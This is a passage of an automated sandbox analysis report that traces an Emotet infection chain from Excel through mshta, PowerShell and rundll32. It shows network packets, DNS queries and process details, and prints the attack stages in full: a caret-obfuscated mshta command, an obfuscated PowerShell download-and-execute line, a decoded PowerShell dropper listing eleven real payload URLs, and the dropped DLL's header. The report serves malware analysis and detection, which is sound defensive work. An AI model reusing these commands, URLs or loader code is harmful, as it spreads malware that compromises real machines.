                                                                          Jan 28, 2022 21:30:07.020325899 CET4916780192.168.2.22139.59.58.214
                                                                          Jan 28, 2022 21:30:07.020334005 CET8049167139.59.58.214192.168.2.22
                                                                          Jan 28, 2022 21:30:07.020356894 CET8049167139.59.58.214192.168.2.22
                                                                          Jan 28, 2022 21:30:07.020370007 CET4916780192.168.2.22139.59.58.214
                                                                          Jan 28, 2022 21:30:07.020378113 CET8049167139.59.58.214192.168.2.22

                                                                          UDP Packets

                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                          Jan 28, 2022 21:30:05.390374899 CET5216753192.168.2.228.8.8.8
                                                                          Jan 28, 2022 21:30:05.741262913 CET53521678.8.8.8192.168.2.22

                                                                          DNS Queries

                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                          Jan 28, 2022 21:30:05.390374899 CET192.168.2.228.8.8.80x8286Standard query (0)ayoobeducationaltrust.inA (IP address)IN (0x0001)

                                                                          DNS Answers

                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                          Jan 28, 2022 21:30:05.741262913 CET8.8.8.8192.168.2.220x8286No error (0)ayoobeducationaltrust.in139.59.58.214A (IP address)IN (0x0001)

                                                                          HTTP Request Dependency Graph

                                                                          • 91.240.118.168
                                                                          • ayoobeducationaltrust.in

                                                                          HTTP Packets

                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                          0192.168.2.224916591.240.118.16880C:\Windows\System32\mshta.exe
                                                                          TimestampkBytes transferredDirectionData
                                                                          Jan 28, 2022 21:29:59.674928904 CET0OUTGET /vvv/ppp/fe.html HTTP/1.1
                                                                          Accept: */*
                                                                          Accept-Language: en-US
                                                                          UA-CPU: AMD64
                                                                          Accept-Encoding: gzip, deflate
                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                          Host: 91.240.118.168
                                                                          Connection: Keep-Alive
                                                                          Jan 28, 2022 21:29:59.736197948 CET2INHTTP/1.1 200 OK
                                                                          Server: nginx/1.20.1
                                                                          Date: Fri, 28 Jan 2022 20:29:59 GMT
                                                                          Content-Type: text/html; charset=utf-8
                                                                          Content-Length: 10938
                                                                          Last-Modified: Thu, 27 Jan 2022 20:39:15 GMT
                                                                          Connection: keep-alive
                                                                          ETag: "61f302f3-2aba"
                                                                          Accept-Ranges: bytes
                                                                          Data Raw: 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 27 78 2d 75 61 2d 63 6f 6d 70 61 74 69 62 6c 65 27 20 63 6f 6e 74 65 6e 74 3d 27 45 6d 75 6c 61 74 65 49 45 39 27 3e 3c 73 63 72 69 70 74 3e 6c 31 6c 3d 64 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 4d 6f 64 65 7c 7c 64 6f 63 75 6d 65 6e 74 2e 61 6c 6c 3b 76 61 72 20 66 39 66 37 36 63 3d 74 72 75 65 3b 6c 6c 31 3d 64 6f 63 75 6d 65 6e 74 2e 6c 61 79 65 72 73 3b 6c 6c 6c 3d 77 69 6e 64 6f 77 2e 73 69 64 65 62 61 72 3b 66 39 66 37 36 63 3d 28 21 28 6c 31 6c 26 26 6c 6c 31 29 26 26 21 28 21 6c 31 6c 26 26 21 6c 6c 31 26 26 21 6c 6c 6c 29 29 3b 6c 5f 6c 6c 3d 6c 6f 63 61 74 69 6f 6e 2b 27 27 3b 6c 31 31 3d 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 3b 66 75 6e 63 74 69 6f 6e 20 6c 49 31 28 6c 31 49 29 7b 72 65 74 75 72 6e 20 6c 31 31 2e 69 6e 64 65 78 4f 66 28 6c 31 49 29 3e 30 3f 74 72 75 65 3a 66 61 6c 73 65 7d 3b 6c 49 49 3d 6c 49 31 28 27 6b 68 74 27 29 7c 6c 49 31 28 27 70 65 72 27 29 3b 66 39 66 37 36 63 7c 3d 6c 49 49 3b 7a 4c 50 3d 6c 6f 63 61 74 69 6f 6e 2e 70 72 6f 74 6f 63 6f 6c 2b 27 30 46 44 27 3b 72 31 4c 34 68 32 57 34 4a 59 59 65 4a 3d 6e 65 77 20 41 72 72 61 79 28 29 3b 62 57 78 36 4a 49 6f 77 77 6e 4f 73 68 3d 6e 65 77 20 41 72 72 61 79 28 29 3b 62 57 78 36 4a 49 6f 77 77 6e 4f 73 68 5b 30 5d 3d 27 65 5c 31 30 36 5c 31 31 33 46 25 33 34 25 33 36 43 25 33 31 27 20 20 20 3b 72 31 4c 34 68 32 57 34 4a 59 59 65 4a 5b 30 5d 3d 27 7f 3c 7f 21 7f 44 7f 4f 7f 43 7f 54 7f 59 7f 50 7f 45 7f 20 7f 68 7f 74 7f 6d 7f 6c 7f 20 7f 50 7f 55 7f 42 7f 4c 7f 49 7f 43 7f 20 7f 22 7f 2d 7f 2f 7f 2f 7f 57 7f 33 7f 43 7e 18 7f 44 7f 54 7f 44 7f 20 7f 58 7f 48 7f 54 7f 4d 7f 4c 7f 20 7f 31 7f 2e 7f 30 7f 20 7f 54 7f 72 7f 61 7f 6e 7f 73 7f 69 7f 74 7f 69 7f 6f 7f 6e 7f 61 7f 6c 7e 18 7f 45 7f 4e 7f 22 7e 15 7e 5c 6e 7f 74 7f 70 7f 3a 7e 18 7f 77 7e 42 7f 2e 7f 77 7f 33 7f 2e 7f 6f 7f 72 7f 67 7f 2f 7f 54 7f 52 7f 2f 7f 78 7e 5c 6e 7e 0c 7f 31 7f 2f 7e 1e 7f 44 7e 4e 7e 50 7f 6c 7f 31 7f 2d 7f 74 7e 2d 7e 2f 7e 31 7e 33 7e 35 7f 6c 7f 2e 7f 64 7f 74 7f 64 7f 22 7f 3e 7f 3c 7e 57 7f 20 7f 78 7e 0c 7e 2f 7f 3d 7f 22 7e 3d 7e 3f 7e 41 7e 43 7e 45 7e 47 7e 49 7f 2f 7f 31 7f 39 7e 79 7e 56 7e 0b 7f 6c 7e 66 7e 68 7f 65 7f 61 7f 64 7e 67 7f 73 7f 63 7f 72 7f 69 7f 70 7f 74 7f 3e 7f 65 7f 76 7e 36 7f 28 7f 75 7f 6e 7f 65 7d 04 7f 61 7f 70 7f 65 7f 28 7f 5c 27 7f 25 7f 37 7f 36 7f 25 7f 36 7f 31 7d 18 7f 32 7f 25 7f 32 7f 30 7d 18 7f 31 7f 79 7f 25 7f 33 7f 37 7d 26 7f 44 7d 20 7d 28 7f 32 7d 28 7f 33 7f 42 7f 5c 5c 7f 31 7d 1c 7d 31 7f 37 7d 1d 7f 33 7f 38 7d 29 7d 31 7f 32 7f 33 7f 74 7d 1e 7f 69 7d 31 7f 35 7f 36 7d 31 7f 34 7d 2c 7f 45 7d 43 7f 36 7f 72 7d 1b 7f 46
                                                                          Data Ascii: <html><head><meta http-equiv='x-ua-compatible' content='EmulateIE9'><script>l1l=document.documentMode||document.all;var f9f76c=true;ll1=document.layers;lll=window.sidebar;f9f76c=(!(l1l&&ll1)&&!(!l1l&&!ll1&&!lll));l_ll=location+'';l11=navigator.userAgent.toLowerCase();function lI1(l1I){return l11.indexOf(l1I)>0?true:false};lII=lI1('kht')|lI1('per');f9f76c|=lII;zLP=location.protocol+'0FD';r1L4h2W4JYYeJ=new Array();bWx6JIowwnOsh=new Array();bWx6JIowwnOsh[0]='e\106\113F%34%36C%31' ;r1L4h2W4JYYeJ[0]='<!DOCTYPE html PUBLIC "-//W3C~DTD XHTML 1.0 Transitional~EN"~~\ntp:~w~B.w3.org/TR/x~\n~1/~D~N~Pl1-t~-~/~1~3~5l.dtd"><~W x~~/="~=~?~A~C~E~G~I/19~y~V~l~f~head~gscript>ev~6(une}ape(\'%76%61}2%20}1y%37}&D} }(2}(3B\\1}}17}38})}123t}i}156}14},E}C6r}F


                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                          1192.168.2.224916691.240.118.16880C:\Windows\System32\mshta.exe
                                                                          TimestampkBytes transferredDirectionData
                                                                          Jan 28, 2022 21:30:05.283601046 CET12OUTGET /vvv/ppp/fe.png HTTP/1.1
                                                                          Host: 91.240.118.168
                                                                          Connection: Keep-Alive
                                                                          Jan 28, 2022 21:30:05.342173100 CET14INHTTP/1.1 200 OK
                                                                          Server: nginx/1.20.1
                                                                          Date: Fri, 28 Jan 2022 20:30:05 GMT
                                                                          Content-Type: image/png
                                                                          Content-Length: 1153
                                                                          Last-Modified: Thu, 27 Jan 2022 20:39:27 GMT
                                                                          Connection: keep-alive
                                                                          ETag: "61f302ff-481"
                                                                          Accept-Ranges: bytes
                                                                          Data Raw: 24 70 61 74 68 20 3d 20 22 43 3a 5c 50 72 6f 67 72 61 6d 44 61 74 61 5c 51 57 45 52 2e 64 6c 6c 22 3b 0d 0a 24 75 72 6c 31 20 3d 20 27 68 74 74 70 3a 2f 2f 61 79 6f 6f 62 65 64 75 63 61 74 69 6f 6e 61 6c 74 72 75 73 74 2e 69 6e 2f 63 6d 73 2f 4c 6d 4f 4f 65 44 6e 4e 6f 30 64 68 34 76 6b 4e 2f 27 3b 0d 0a 24 75 72 6c 32 20 3d 20 27 68 74 74 70 3a 2f 2f 6c 79 6e 73 6d 69 74 68 67 72 6f 75 70 2e 63 6f 6d 2f 68 66 74 6d 32 69 32 2f 4b 5a 49 46 77 6a 6d 77 57 49 31 73 79 2f 27 3b 0d 0a 24 75 72 6c 33 20 3d 20 27 68 74 74 70 3a 2f 2f 63 75 72 76 79 67 69 72 6c 73 62 6f 75 74 69 71 75 65 2e 63 6f 6d 2f 6a 66 65 72 74 6c 2f 47 65 34 39 7a 63 49 7a 62 38 4b 57 77 58 46 46 6b 2f 27 3b 0d 0a 24 75 72 6c 34 20 3d 20 27 68 74 74 70 3a 2f 2f 74 68 65 73 6f 63 69 61 6c 61 67 65 6e 74 2e 6e 65 74 2f 62 2f 4d 4f 35 41 4b 71 4a 39 54 79 39 6c 45 2f 27 3b 0d 0a 24 75 72 6c 35 20 3d 20 27 68 74 74 70 3a 2f 2f 62 61 77 65 6c 6e 69 61 6e 6b 61 2e 63 66 6f 6c 6b 73 2e 70 6c 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 54 74 76 2f 27 3b 0d 0a 24 75 72 6c 36 20 3d 20 27 68 74 74 70 3a 2f 2f 74 65 73 74 2e 64 72 65 61 6d 63 69 74 79 6f 72 6c 61 6e 64 6f 2e 63 6f 6d 2f 74 30 6d 6d 78 2f 78 42 42 58 69 2f 27 3b 0d 0a 24 75 72 6c 37 20 3d 20 27 68 74 74 70 3a 2f 2f 68 75 63 75 6c 65 6b 2e 66 75 74 75 72 65 68 6f 73 74 2e 70 6c 2f 69 6d 61 67 65 73 2f 36 44 62 62 6d 6f 36 78 45 51 44 44 2f 27 3b 0d 0a 24 75 72 6c 38 20 3d 20 27 68 74 74 70 3a 2f 2f 74 65 73 74 2e 76 61 6c 65 73 74 75 64 69 6f 73 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 61 50 76 57 37 41 70 4e 62 52 59 34 5a 47 50 2f 27 3b 0d 0a 24 75 72 6c 39 20 3d 20 27 68 74 74 70 3a 2f 2f 63 72 6d 2e 63 6f 6d 70 72 61 63 61 73 61 65 6e 68 6f 75 73 74 6f 6e 2e 63 6f 6d 2f 68 73 34 64 38 61 2f 63 30 73 31 33 49 2f 27 3b 0d 0a 24 75 72 6c 31 30 20 3d 20 27 68 74 74 70 3a 2f 2f 73 65 6c 6c 69 6e 2e 61 70 70 2f 77 70 2d 61 64 6d 69 6e 2f 53 32 63 44 50 59 58 4e 4b 45 6e 54 2f 27 3b 0d 0a 24 75 72 6c 31 31 20 3d 20 27 68 74 74 70 3a 2f 2f 63 6d 69 74 2e 76 61 6c 65 73 74 75 64 69 6f 73 2e 63 6f 6d 2f 77 70 2d 61 64 6d 69 6e 2f 52 75 65 47 4a 34 31 41 2f 27 3b 0d 0a 0d 0a 24 77 65 62 20 3d 20 4e 65 77 2d 4f 62 6a 65 63 74 20 6e 65 74 2e 77 65 62 63 6c 69 65 6e 74 3b 0d 0a 24 75 72 6c 73 20 3d 20 22 24 75 72 6c 31 2c 24 75 72 6c 32 2c 24 75 72 6c 33 2c 24 75 72 6c 34 2c 24 75 72 6c 35 2c 24 75 72 6c 36 2c 24 75 72 6c 37 2c 24 75 72 6c 38 2c 24 75 72 6c 39 2c 24 75 72 6c 31 30 2c 24 75 72 6c 31 31 22 2e 73 70 6c 69 74 28 22 2c 22 29 3b 0d 0a 66 6f 72 65 61 63 68 20 28 24 75 72 6c 20 69 6e 20 24 75 72 6c 73 29 20 7b 0d 0a 20 20 20 74 72 79 20 7b 0d 0a 20 20 20 20 20 20 20 24 77 65 62 2e 44 6f 77 6e 6c 6f 61 64 46 69 6c 65 28 24 75 72 6c 2c 20 24 70 61 74 68 29 3b 0d 0a 20 20 20 20 20 20 20 69 66 20 28 28 47 65 74 2d 49 74 65 6d 20 24 70 61 74 68 29 2e 4c 65 6e 67 74 68 20 2d 67 65 20 33 30 30 30 30 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 5b 44 69 61 67 6e 6f 73 74 69 63 73 2e 50 72 6f 63 65 73 73 5d 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 62 72 65 61 6b 3b 0d 0a 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 7d 0d 0a 20 20 20 63 61 74 63 68 7b 7d 0d 0a 7d 20 0d 0a 53 6c 65 65 70 20 2d 73 20 34 3b 63 6d 64 20 2f 63 20 43 3a 5c 57 69 6e 64 6f 77 73 5c 53 79 73 57 6f 77 36 34 5c 72 75 6e 64 6c 6c 33 32 2e 65 78 65 20 27 43 3a
                                                                          Data Ascii: $path = "C:\ProgramData\QWER.dll";$url1 = 'http://ayoobeducationaltrust.in/cms/LmOOeDnNo0dh4vkN/';$url2 = 'http://lynsmithgroup.com/hftm2i2/KZIFwjmwWI1sy/';$url3 = 'http://curvygirlsboutique.com/jfertl/Ge49zcIzb8KWwXFFk/';$url4 = 'http://thesocialagent.net/b/MO5AKqJ9Ty9lE/';$url5 = 'http://bawelnianka.cfolks.pl/wp-content/Ttv/';$url6 = 'http://test.dreamcityorlando.com/t0mmx/xBBXi/';$url7 = 'http://huculek.futurehost.pl/images/6Dbbmo6xEQDD/';$url8 = 'http://test.valestudios.com/wp-content/aPvW7ApNbRY4ZGP/';$url9 = 'http://crm.compracasaenhouston.com/hs4d8a/c0s13I/';$url10 = 'http://sellin.app/wp-admin/S2cDPYXNKEnT/';$url11 = 'http://cmit.valestudios.com/wp-admin/RueGJ41A/';$web = New-Object net.webclient;$urls = "$url1,$url2,$url3,$url4,$url5,$url6,$url7,$url8,$url9,$url10,$url11".split(",");foreach ($url in $urls) { try { $web.DownloadFile($url, $path); if ((Get-Item $path).Length -ge 30000) { [Diagnostics.Process]; break; } } catch{}} Sleep -s 4;cmd /c C:\Windows\SysWow64\rundll32.exe 'C:


                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                          2192.168.2.2249167139.59.58.21480C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          TimestampkBytes transferredDirectionData
                                                                          Jan 28, 2022 21:30:06.070625067 CET15OUTGET /cms/LmOOeDnNo0dh4vkN/ HTTP/1.1
                                                                          Host: ayoobeducationaltrust.in
                                                                          Connection: Keep-Alive
                                                                          Jan 28, 2022 21:30:06.391297102 CET16INHTTP/1.1 200 OK
                                                                          Date: Fri, 28 Jan 2022 20:28:51 GMT
                                                                          Server: Apache
                                                                          Set-Cookie: 61f4520308e3e=1643401731; expires=Fri, 28-Jan-2022 20:29:51 GMT; Max-Age=60; path=/
                                                                          Cache-Control: no-cache, must-revalidate
                                                                          Pragma: no-cache
                                                                          Last-Modified: Fri, 28 Jan 2022 20:28:51 GMT
                                                                          Expires: Fri, 28 Jan 2022 20:28:51 GMT
                                                                          Content-Disposition: attachment; filename="xfm.dll"
                                                                          Content-Transfer-Encoding: binary
                                                                          Content-Length: 548864
                                                                          Keep-Alive: timeout=5, max=100
                                                                          Connection: Keep-Alive
                                                                          Content-Type: application/x-msdownload
                                                                          Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 68 73 c2 61 2c 12 ac 32 2c 12 ac 32 2c 12 ac 32 ef 1d f3 32 26 12 ac 32 ef 1d f1 32 37 12 ac 32 2c 12 ad 32 0e 10 ac 32 0b d4 d1 32 36 12 ac 32 0b d4 c1 32 a6 12 ac 32 0b d4 c2 32 b2 12 ac 32 0b d4 d6 32 2d 12 ac 32 0b d4 d0 32 2d 12 ac 32 0b d4 d4 32 2d 12 ac 32 52 69 63 68 2c 12 ac 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 3e fa f3 61 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 08 00 00 50 04 00 00 00 04 00 00 00 00 00 06 0d 03 00 00 10 00 00 00 60 04 00 00 00 00 10 00 10 00 00 00 10 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 a0 08 00 00 10 00 00 98 df 08 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 40 2d 05 00 52 00 00 00 34 10 05 00 04 01 00 00 00 a0 05 00 50 56 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 00 30 4e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 bd 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 60 04 00 94 05 00 00 ac 0f 05 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 39 45 04 00 00 10 00 00 00 50 04 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 92 cd 00 00 00 60 04 00 00 d0 00 00 00 60 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 80 65 00 00 00 30 05 00 00 30 00 00 00 30 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 50 56 02 00 00 a0 05 00 00 60 02 00 00 60 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 62 93 00 00 00 00 08 00 00 a0 00 00 00 c0 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                          Data Ascii: MZ@!L!This program cannot be run in DOS mode.$hsa,2,2,22&2272,2226222222-22-22-2Rich,2PEL>a!P`@-R4PV0N@`@.text9EP `.rdata``@@.datae000@.rsrcPV``@@.relocb@B


                                                                          Statistics

                                                                          Behavior

                                                                          Click to jump to process

                                                                          System Behavior

                                                                          General

                                                                          Target ID:0
                                                                          Start time:21:29:20
                                                                          Start date:28/01/2022
                                                                          Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                          Wow64 process (32bit):false
                                                                          Commandline:"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                                                                          Imagebase:0x13f410000
                                                                          File size:28253536 bytes
                                                                          MD5 hash:D53B85E21886D2AF9815C377537BCAC3
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high

                                                                          General

                                                                          Target ID:2
                                                                          Start time:21:29:22
                                                                          Start date:28/01/2022
                                                                          Path:C:\Windows\System32\cmd.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:CMD.EXE /c ms^hta http://91.2^40.118.1^68/vvv/ppp/f^e.ht^m^l
                                                                          Imagebase:0x4abd0000
                                                                          File size:345088 bytes
                                                                          MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high

                                                                          General

                                                                          Target ID:4
                                                                          Start time:21:29:23
                                                                          Start date:28/01/2022
                                                                          Path:C:\Windows\System32\mshta.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:mshta http://91.240.118.168/vvv/ppp/fe.html
                                                                          Imagebase:0x13f1b0000
                                                                          File size:13824 bytes
                                                                          MD5 hash:95828D670CFD3B16EE188168E083C3C5
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high

                                                                          General

                                                                          Target ID:6
                                                                          Start time:21:29:26
                                                                          Start date:28/01/2022
                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.168/vvv/ppp/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X
                                                                          Imagebase:0x13fba0000
                                                                          File size:473600 bytes
                                                                          MD5 hash:852D67A27E454BD389FA7F02A8CBE23F
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:.Net C# or VB.NET
                                                                          Reputation:high

                                                                          General

                                                                          Target ID:8
                                                                          Start time:21:29:38
                                                                          Start date:28/01/2022
                                                                          Path:C:\Windows\System32\cmd.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:"C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\ProgramData\QWER.dll BBDD
                                                                          Imagebase:0x4abd0000
                                                                          File size:345088 bytes
                                                                          MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high

                                                                          General

                                                                          Target ID:9
                                                                          Start time:21:29:39
                                                                          Start date:28/01/2022
                                                                          Path:C:\Windows\SysWOW64\rundll32.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:C:\Windows\SysWow64\rundll32.exe C:\ProgramData\QWER.dll BBDD
                                                                          Imagebase:0xc00000
                                                                          File size:44544 bytes
                                                                          MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000009.00000002.460122857.0000000000341000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000009.00000002.460211581.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000009.00000002.460063482.0000000000190000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          Reputation:high

                                                                          General

                                                                          Target ID:10
                                                                          Start time:21:29:42
                                                                          Start date:28/01/2022
                                                                          Path:C:\Windows\SysWOW64\rundll32.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:C:\Windows\SysWOW64\rundll32.exe "C:\ProgramData\QWER.dll",DllRegisterServer
                                                                          Imagebase:0xc00000
                                                                          File size:44544 bytes
                                                                          MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.512416856.0000000002F40000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.512269279.0000000002820000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.511939105.0000000000441000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.511964806.0000000000470000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.512350669.0000000002E00000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.512137672.0000000000AE1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.511829011.00000000001E1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.511865871.0000000000310000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.511778687.0000000000170000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.512384350.0000000002E81000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.512450327.0000000003021000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.512203615.0000000000BD1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.512323278.0000000002DD1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.512502215.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.512166505.0000000000B10000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          Reputation:high

                                                                          General

                                                                          Target ID:11
                                                                          Start time:21:30:04
                                                                          Start date:28/01/2022
                                                                          Path:C:\Windows\SysWOW64\rundll32.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Bwqooqqzlaw\cojfo.cqz",OOkfVaPZ
